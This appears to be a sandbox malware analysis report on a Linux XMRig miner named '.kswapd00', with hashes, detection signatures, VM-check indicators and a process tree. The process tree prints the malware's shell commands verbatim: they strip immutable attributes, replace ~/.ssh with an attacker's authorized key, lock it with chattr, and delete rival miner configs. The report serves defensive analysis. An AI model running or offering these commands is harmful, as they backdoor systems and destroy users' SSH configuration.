Analysis
-
max time kernel
299s -
max time network
287s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
03-01-2025 07:30
Behavioral task
behavioral1
Sample
.kswapd00
Resource
ubuntu2204-amd64-20240611-en
ubuntu-22.04-amd64
14 signatures
300 seconds
General
-
Target
.kswapd00
-
Size
2.1MB
-
MD5
1c36e8aaac825bcb9a086ecf2a471c89
-
SHA1
66cb901aadae8db4511a364024d555427d78d3f9
-
SHA256
7a5c9606d068a16565c65aa8c5ee11ccecdc7098b91023dcfdb0c78695af4574
-
SHA512
8a65ee52874ec24b4dda49e63153aec981bd310c49245f5d26592824a1ad0da52c7233c31e7a380ba1fe9aeff6f453db1345686eceafb8b6dfd80f9eef25dda1
-
SSDEEP
49152:WWD683TqbMtemJOGmHBox1Q6jtSVVO7EHsq8:J6dM3OGUCoPVs7EH8
Score
10/10
Malware Config
Signatures
-
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/memory/1587-1-0x0000000000400000-0x0000000000a65ff8-memory.dmp xmrig -
Attempts to change immutable files 6 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1591 chattr 1592 chattr 1593 sh 1594 sh 1595 chattr 1597 chattr -
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/sys_vendor .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/product_name .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/board_vendor .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor .kswapd00 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/board_serial .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/chassis_type .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/chassis_version .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/bios_version .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/product_version .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/board_name .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/product_uuid .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/bios_date .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/product_serial .kswapd00 File opened for reading /sys/devices/virtual/dmi/id/board_version .kswapd00 -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself kauditd0 1587 .kswapd00 Changes the process name, possibly in an attempt to hide itself sshd@notty 1588 .kswapd00 -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo .kswapd00 -
Reads CPU attributes 1 TTPs 45 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/cpu0/topology/die_cpus .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/size .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/topology/package_cpus .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/id .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/level .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/possible .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/id .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/type .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cpu_capacity .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/topology/core_id .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/id .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/type .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size .kswapd00 File opened for reading /sys/devices/system/cpu/online .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/topology/physical_package_id .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/level .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/id .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/topology/core_cpus .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/level .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index1/type .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/level .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/base_frequency .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/topology/cluster_cpus .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/type .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map .kswapd00 File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq .kswapd00 -
Enumerates kernel/hardware configuration 1 TTPs 24 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages .kswapd00 File opened for reading /sys/devices/system/node/node0/access1/initiators .kswapd00 File opened for reading /sys/devices/virtual/dmi/id .kswapd00 File opened for reading /sys/fs/cgroup/cpuset.mems.effective .kswapd00 File opened for reading /sys/kernel/mm/hugepages .kswapd00 File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages .kswapd00 File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages .kswapd00 File opened for reading /sys/devices/system/node/online .kswapd00 File opened for reading /sys/firmware/dmi/tables/smbios_entry_point .kswapd00 File opened for reading /sys/devices/system/node/node0/access0/initiators .kswapd00 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages .kswapd00 File opened for reading /sys/fs/cgroup/cpuset.cpus.effective .kswapd00 File opened for reading /sys/devices/system/cpu .kswapd00 File opened for reading /sys/devices/system/node/node0/cpumap .kswapd00 File opened for reading /sys/devices/system/node/node0/hugepages .kswapd00 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages .kswapd00 File opened for reading /sys/devices/system/node/node0/meminfo .kswapd00 File opened for reading /sys/bus/dax/devices .kswapd00 File opened for reading /sys/devices/system/node/node0/access0/initiators/write_bandwidth .kswapd00 File opened for reading /sys/devices/system/node/node0/access0/initiators/read_latency .kswapd00 File opened for reading /sys/devices/system/node/node0/access0/initiators/write_latency .kswapd00 File opened for reading /sys/fs/cgroup/cgroup.controllers .kswapd00 File opened for reading /sys/devices/system/node/node0/access0/initiators/read_bandwidth .kswapd00 File opened for reading /sys/firmware/dmi/tables/DMI .kswapd00 -
description ioc Process File opened for reading /proc/93/cmdline .kswapd00 File opened for reading /proc/112/cmdline .kswapd00 File opened for reading /proc/223/cmdline .kswapd00 File opened for reading /proc/self/cpuset .kswapd00 File opened for reading /proc/21/cmdline .kswapd00 File opened for reading /proc/25/cmdline .kswapd00 File opened for reading /proc/80/cmdline .kswapd00 File opened for reading /proc/88/cmdline .kswapd00 File opened for reading /proc/1312/cmdline .kswapd00 File opened for reading /proc/1401/cmdline .kswapd00 File opened for reading /proc/76/cmdline .kswapd00 File opened for reading /proc/988/cmdline .kswapd00 File opened for reading /proc/1158/cmdline .kswapd00 File opened for reading /proc/1471/cmdline .kswapd00 File opened for reading /proc/86/cmdline .kswapd00 File opened for reading /proc/90/cmdline .kswapd00 File opened for reading /proc/118/cmdline .kswapd00 File opened for reading /proc/446/cmdline .kswapd00 File opened for reading /proc/738/cmdline .kswapd00 File opened for reading /proc/3/cmdline .kswapd00 File opened for reading /proc/75/cmdline .kswapd00 File opened for reading /proc/101/cmdline .kswapd00 File opened for reading /proc/1201/cmdline .kswapd00 File opened for reading /proc/1259/cmdline .kswapd00 File opened for reading /proc/1576/cmdline .kswapd00 File opened for reading /proc/92/cmdline .kswapd00 File opened for reading /proc/582/cmdline .kswapd00 File opened for reading /proc/838/cmdline .kswapd00 File opened for reading /proc/1116/cmdline .kswapd00 File opened for reading /proc/1160/cmdline .kswapd00 File opened for reading /proc/1588/cmdline .kswapd00 File opened for reading /proc/4/cmdline .kswapd00 File opened for reading /proc/14/cmdline .kswapd00 File opened for reading /proc/23/cmdline .kswapd00 File opened for reading /proc/209/cmdline .kswapd00 File opened for reading /proc/780/cmdline .kswapd00 File opened for reading /proc/584/cmdline .kswapd00 File opened for reading /proc/650/cmdline .kswapd00 File opened for reading /proc/761/cmdline .kswapd00 File opened for reading /proc/2/cmdline .kswapd00 File opened for reading /proc/99/cmdline .kswapd00 File opened for reading /proc/109/cmdline .kswapd00 File opened for reading /proc/221/cmdline .kswapd00 File opened for reading /proc/411/cmdline .kswapd00 File opened for reading /proc/1177/cmdline .kswapd00 File opened for reading /proc/1168/cmdline .kswapd00 File opened for reading /proc/1272/cmdline .kswapd00 File opened for reading /proc/1554/cmdline .kswapd00 File opened for reading /proc/5/cmdline .kswapd00 File opened for reading /proc/79/cmdline .kswapd00 File opened for reading /proc/214/cmdline .kswapd00 File opened for reading /proc/762/cmdline .kswapd00 File opened for reading /proc/1041/cmdline .kswapd00 File opened for reading /proc/1599/cmdline .kswapd00 File opened for reading /proc/mounts .kswapd00 File opened for reading /proc/213/cmdline .kswapd00 File opened for reading /proc/588/cmdline .kswapd00 File opened for reading /proc/1090/cmdline .kswapd00 File opened for reading /proc/1108/cmdline .kswapd00 File opened for reading /proc/695/cmdline .kswapd00 File opened for reading /proc/959/cmdline .kswapd00 File opened for reading /proc/1175/cmdline .kswapd00 File opened for reading /proc/17/cmdline .kswapd00 File opened for reading /proc/27/cmdline .kswapd00 -
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/cert.pem .kswapd00 File opened for modification /tmp/cert_key.pem .kswapd00
Processes
-
/tmp/.kswapd00/tmp/.kswapd001⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Changes its process name
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1587 -
/bin/shsh -c "sh -c 'chattr -ia ~/.ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; chattr +ia ~/.ssh' >> /dev/null 2>&1"2⤵PID:1589
-
/usr/bin/shsh -c "chattr -ia ~/.ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; chattr +ia ~/.ssh"3⤵PID:1590
-
/usr/bin/chattrchattr -ia "~/.ssh"4⤵
- Attempts to change immutable files
PID:1591
-
-
/usr/bin/chattrchattr +ia "~/.ssh"4⤵
- Attempts to change immutable files
PID:1592
-
-
-
-
/bin/shsh -c "sh -c 'chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json' >>/dev/null 2>&1"2⤵
- Attempts to change immutable files
PID:1593 -
/usr/bin/shsh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"3⤵
- Attempts to change immutable files
PID:1594 -
/usr/bin/chattrchattr -ia "~/.xmrig.json"4⤵
- Attempts to change immutable files
PID:1595
-
-
/usr/bin/rmrm -rf "~/.xmrig.json"4⤵PID:1596
-
-
/usr/bin/chattrchattr -ia "~/.config/xmrig.json"4⤵
- Attempts to change immutable files
PID:1597
-
-
/usr/bin/rmrm -rf "~/.config/xmrig.json"4⤵PID:1598
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD599c24798cefa2dd4d36b695585f5e818
SHA1127f1982010e782d3cc223ad8f6eafac838df226
SHA25610c199bed53bed342f1737ff7a954e7821a7b96631448c1853950ca7d2c34be0
SHA51214368c835f2ff8b803d4e5725ada27214de31b1eb4482e56ad7c04afb95d5ee675b2e1b175396d7e6092734d3946760814ce5daaad68c40c53a279d6a47290dc
-
Filesize
5B
MD532b3fd0dac3d8c344f97fddd263e4d65
SHA14081bd590df5bea25ef9106c0e38ab31c33caf84
SHA256fa2ee8b60b8f5d897641819a70415cd602060df5d1379a07f5e4ed987c6e947d
SHA5121d0568e1b2c5937e1972d57d2347bbf58130745a2b841585adc4c731041f76a00f6af0eee866c7aa68d672af42f58fdd69cfd5033b9e65ed01554d4df2c14a33